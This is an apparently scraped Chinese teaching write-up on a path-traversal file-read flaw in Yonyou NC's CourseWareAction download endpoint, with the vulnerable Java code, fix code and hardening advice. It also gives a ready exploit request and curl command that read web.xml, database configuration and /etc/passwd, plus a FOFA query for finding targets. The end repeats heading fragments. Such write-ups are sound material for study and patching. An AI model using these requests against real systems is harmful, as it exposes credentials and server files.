用友NC任意文件读取漏洞分析教学文档<\/h1>

一、漏洞概述<\/h2>

1.1 漏洞简介<\/h3>
用友NC系统的CourseWareAction接口存在任意文件读取漏洞，攻击者可通过构造特定的fileName参数，直接读取服务器上的任意文件，导致敏感信息泄露。<\/p>

1.2 漏洞危害等级<\/h3>

危害程度<\/strong>：高危<\/li>

影响范围<\/strong>：可读取服务器任意文件，包括配置文件、敏感数据等<\/li> <\/ul>
二、影响版本<\/h2>
2.1 确认受影响版本<\/h3>

用友NC 6.5版本<\/li> <\/ul>
2.2 可能受影响版本<\/h3>

其他未打补丁的用友NC版本可能存在类似问题<\/li> <\/ul>
三、漏洞原理深度分析<\/h2>
3.1 漏洞位置定位<\/h3>
漏洞位于hrss包目录下的CourseWareAction接口的download方法中。<\/p>
3.2 关键漏洞代码分析<\/h3>
@Action<\/span> <\/span><\/span>public<\/span> void<\/span> download<\/span>()<\/span> {<\/span> <\/span><\/span> String fileName =<\/span> this<\/span>.<\/span>request<\/span>.<\/span>getParameter<\/span>(<\/span>"fileName"<\/span>);<\/span> <\/span><\/span> fileName =<\/span> StringUtil.<\/span>convertToCorrectEncoding<\/span>(<\/span>fileName);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 漏洞核心代码：未对fileName进行安全过滤 <\/span><\/span><\/span><\/span> String strSrcDir =<\/span> CodeGenUtils.<\/span>buildFileURL<\/span>(<\/span>RuntimeEnv.<\/span>getInstance<\/span>().<\/span>getNCHome<\/span>(),<\/span> <\/span><\/span> new<\/span> String[]{<\/span>"ware"<\/span>,<\/span> fileName});<\/span> <\/span><\/span> <\/span><\/span> OutputStream out =<\/span> null<\/span>;<\/span> <\/span><\/span> BufferedInputStream bufferedInputStream =<\/span> null<\/span>;<\/span> <\/span><\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>request<\/span>.<\/span>setCharacterEncoding<\/span>(<\/span>"UTF-8"<\/span>);<\/span> <\/span><\/span> File file =<\/span> new<\/span> File(<\/span>strSrcDir);<\/span> <\/span><\/span> FileInputStream fileInput =<\/span> new<\/span> FileInputStream(<\/span>file);<\/span> <\/span><\/span> bufferedInputStream =<\/span> new<\/span> BufferedInputStream(<\/span>fileInput);<\/span> <\/span><\/span> byte<\/span>[]<\/span> pngBytes =<\/span> new<\/span> byte<\/span>[<\/span>bufferedInputStream.<\/span>available<\/span>()];<\/span> <\/span><\/span> bufferedInputStream.<\/span>read<\/span>(<\/span>pngBytes);<\/span> <\/span><\/span> <\/span><\/span> this<\/span>.<\/span>response<\/span>.<\/span>reset<\/span>();<\/span> <\/span><\/span> this<\/span>.<\/span>response<\/span>.<\/span>setCharacterEncoding<\/span>(<\/span>"UTF-8"<\/span>);<\/span> <\/span><\/span> this<\/span>.<\/span>response<\/span>.<\/span>setContentType<\/span>(<\/span>"APPLICATION\/OCTET-STREAM"<\/span>);<\/span> <\/span><\/span> this<\/span>.<\/span>response<\/span>.<\/span>setHeader<\/span>(<\/span>"Content-disposition"<\/span>,<\/span> <\/span><\/span> "attachment;filename="<\/span> +<\/span> new<\/span> String(<\/span>fileName.<\/span>getBytes<\/span>(<\/span>"gb2312"<\/span>),<\/span> "ISO8859-1"<\/span>));<\/span> <\/span><\/span> <\/span><\/span> out =<\/span> new<\/span> BufferedOutputStream(<\/span>this<\/span>.<\/span>response<\/span>.<\/span>getOutputStream<\/span>());<\/span> <\/span><\/span> out.<\/span>write<\/span>(<\/span>pngBytes);<\/span> <\/span><\/span> out.<\/span>flush<\/span>();<\/span> <\/span><\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception var11)<\/span> {<\/span> <\/span><\/span> Exception e =<\/span> var11;<\/span> <\/span><\/span> throw<\/span> new<\/span> LfwRuntimeException(<\/span>"指定位置找不到课件附件，下载失败！"<\/span>,<\/span> e);<\/span> <\/span><\/span> }<\/span> finally<\/span> {<\/span> <\/span><\/span> IOUtils.<\/span>closeQuietly<\/span>(<\/span>out);<\/span> <\/span><\/span> IOUtils.<\/span>closeQuietly<\/span>(<\/span>bufferedInputStream);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.3 漏洞成因分析<\/h3> 3.3.1 路径构造缺陷<\/h4> String strSrcDir =<\/span> CodeGenUtils.<\/span>buildFileURL<\/span>(<\/span>RuntimeEnv.<\/span>getInstance<\/span>().<\/span>getNCHome<\/span>(),<\/span> <\/span><\/span> new<\/span> String[]{<\/span>"ware"<\/span>,<\/span> fileName});<\/span> <\/span><\/span><\/code><\/pre> 直接使用用户输入的fileName参数构建文件路径<\/li> 未对路径遍历字符（..\/）进行过滤<\/li> 未对文件路径进行合法性校验<\/li> <\/ul> 3.3.2 文件读取流程<\/h4> 获取用户输入的fileName参数<\/li> 构建完整文件路径：NCHome + "ware" + fileName<\/li> 直接创建File对象并读取文件内容<\/li> 通过HTTP响应输出文件内容<\/li> <\/ol> 3.4 安全缺陷点<\/h3> 缺乏输入验证<\/strong>：未对fileName参数进行有效性检查<\/li> 路径遍历漏洞<\/strong>：允许使用..\/进行目录遍历<\/li> 权限控制缺失<\/strong>：未验证用户是否有权访问请求的文件<\/li> 错误信息泄露<\/strong>：异常信息可能暴露系统路径信息<\/li> <\/ol> 四、漏洞利用方法<\/h2> 4.1 利用条件<\/h3> 目标系统存在漏洞版本<\/li> 攻击者能够访问目标系统的Web服务<\/li> <\/ul> 4.2 攻击Payload构造<\/h3> 4.2.1 基础利用方式<\/h4> GET<\/span> \/portal\/pt\/downCourseWare\/download?fileName=..\/webapps\/nc_web\/WEB-INF\/web.xml&pageId=login HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target_ip<\/span> <\/span><\/span><\/code><\/pre>4.2.2 可读取的关键文件<\/h4> 配置文件<\/strong>：..\/webapps\/nc_web\/WEB-INF\/web.xml<\/li> 数据库配置<\/strong>：..\/webapps\/nc_web\/WEB-INF\/classes\/数据库配置文件<\/li> 系统文件<\/strong>：..\/..\/..\/..\/etc\/passwd（Linux系统）<\/li> 日志文件<\/strong>：..\/logs\/系统日志文件<\/li> <\/ul> 4.3 利用步骤<\/h3> 识别目标系统为用友NC<\/li> 构造包含路径遍历字符的fileName参数<\/li> 发送HTTP请求到漏洞接口<\/li> 获取服务器返回的文件内容<\/li> <\/ol> 五、漏洞检测方法<\/h2> 5.1 手工检测<\/h3> 使用curl或浏览器插件发送测试请求：<\/p> curl "http:\/\/target_ip\/portal\/pt\/downCourseWare\/download?fileName=..\/webapps\/nc_web\/WEB-INF\/web.xml&pageId=login"<\/span> <\/span><\/span><\/code><\/pre>5.2 自动化检测<\/h3> 编写检测脚本，特征判断：<\/p> 响应内容包含XML声明或配置文件内容<\/li> 响应头包含文件下载标识<\/li> 文件存在时的正常响应与文件不存在时的错误响应差异<\/li> <\/ul> 5.3 资产发现<\/h3> 使用FOFA进行资产测绘：<\/p> app="用友-UFIDA-NC" <\/code><\/pre> 六、漏洞修复方案<\/h2> 6.1 临时修复措施<\/h3> 6.1.1 输入验证加固<\/h4> public<\/span> void<\/span> download<\/span>()<\/span> {<\/span> <\/span><\/span> String fileName =<\/span> this<\/span>.<\/span>request<\/span>.<\/span>getParameter<\/span>(<\/span>"fileName"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 添加输入验证 <\/span><\/span><\/span><\/span> if<\/span> (<\/span>fileName ==<\/span> null<\/span> ||<\/span> fileName.<\/span>contains<\/span>(<\/span>".."<\/span>)<\/span> ||<\/span> fileName.<\/span>contains<\/span>(<\/span>"\/"<\/span>)<\/span> ||<\/span> fileName.<\/span>contains<\/span>(<\/span>"\\"<\/span>))<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> SecurityException(<\/span>"非法文件名"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 限制文件类型 <\/span><\/span><\/span><\/span> if<\/span> (!<\/span>fileName.<\/span>endsWith<\/span>(<\/span>".pdf"<\/span>)<\/span> &&<\/span> !<\/span>fileName.<\/span>endsWith<\/span>(<\/span>".doc"<\/span>)<\/span> &&<\/span> !<\/span>fileName.<\/span>endsWith<\/span>(<\/span>".ppt"<\/span>))<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> SecurityException(<\/span>"不支持的文件类型"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 继续原有逻辑... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>6.1.2 路径规范化检查<\/h4> \/\/ 规范化路径并检查是否在允许目录内 <\/span><\/span><\/span><\/span>Path basePath =<\/span> Paths.<\/span>get<\/span>(<\/span>RuntimeEnv.<\/span>getInstance<\/span>().<\/span>getNCHome<\/span>(),<\/span> "ware"<\/span>);<\/span> <\/span><\/span>Path requestedPath =<\/span> basePath.<\/span>resolve<\/span>(<\/span>fileName).<\/span>normalize<\/span>();<\/span> <\/span><\/span> <\/span><\/span>if<\/span> (!<\/span>requestedPath.<\/span>startsWith<\/span>(<\/span>basePath))<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> SecurityException(<\/span>"路径遍历攻击检测"<\/span>);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>6.2 官方修复方案<\/h3> 安装用友官方发布的最新安全补丁<\/li> 升级到不受影响的版本<\/li> 遵循最小权限原则配置系统权限<\/li> <\/ol> 6.3 安全加固建议<\/h3> 6.3.1 应用层防护<\/h4> 对所有用户输入进行严格验证<\/li> 实施白名单机制限制可访问的文件<\/li> 添加身份认证和权限验证<\/li> <\/ul> 6.3.2 系统层防护<\/h4> 使用专用用户运行应用，限制其文件系统访问权限<\/li> 定期更新系统和应用补丁<\/li> 部署WAF防护路径遍历攻击<\/li> <\/ul> 七、漏洞防范最佳实践<\/h2> 7.1 安全开发规范<\/h3> 输入验证原则<\/strong>：所有用户输入都视为不可信的<\/li> 最小权限原则<\/strong>：应用程序以最小必要权限运行<\/li> 防御性编程<\/strong>：假设所有外部输入都可能是恶意的<\/li> <\/ol> 7.2 代码审查要点<\/h3> 检查所有文件操作相关的用户输入处理<\/li> 验证路径解析和规范化逻辑<\/li> 确认权限检查机制的完整性<\/li> <\/ol> 7.3 安全测试重点<\/h3> 路径遍历漏洞测试<\/li> 文件权限绕过测试<\/li> 输入验证机制测试<\/li> <\/ol> 八、总结<\/h2> 用友NC任意文件读取漏洞是一个典型的安全编码问题，根源在于对用户输入缺乏充分的验证和过滤。通过本次分析，应重点掌握：<\/p> 路径遍历漏洞的原理和利用方式<\/li> 安全编码中输入验证的重要性<\/li> 多层防御策略的实施方法<\/li> 漏洞修复和防护的最佳实践<\/li> <\/ol> 此漏洞案例为安全开发和代码审计提供了重要的参考价值，强调了在文件操作等敏感功能中实施严格安全控制的重要性。<\/p>

用友NC任意文件读取漏洞分析教学文档<\/h1>

一、漏洞概述<\/h2>

1.1 漏洞简介<\/h3> 用友NC系统的CourseWareAction接口存在任意文件读取漏洞，攻击者可通过构造特定的fileName参数，直接读取服务器上的任意文件，导致敏感信息泄露。<\/p>

二、影响版本<\/h2>

三、漏洞原理深度分析<\/h2>

3.1 漏洞位置定位<\/h3> 漏洞位于hrss包目录下的CourseWareAction接口的download方法中。<\/p>

3.3 漏洞成因分析<\/h3>

四、漏洞利用方法<\/h2>

4.2 攻击Payload构造<\/h3>

五、漏洞检测方法<\/h2>

六、漏洞修复方案<\/h2>

6.1 临时修复措施<\/h3>

6.3 安全加固建议<\/h3>

七、漏洞防范最佳实践<\/h2>

1.1 漏洞简介<\/h3>
用友NC系统的CourseWareAction接口存在任意文件读取漏洞，攻击者可通过构造特定的fileName参数，直接读取服务器上的任意文件，导致敏感信息泄露。<\/p>

3.1 漏洞位置定位<\/h3>
漏洞位于hrss包目录下的CourseWareAction接口的download方法中。<\/p>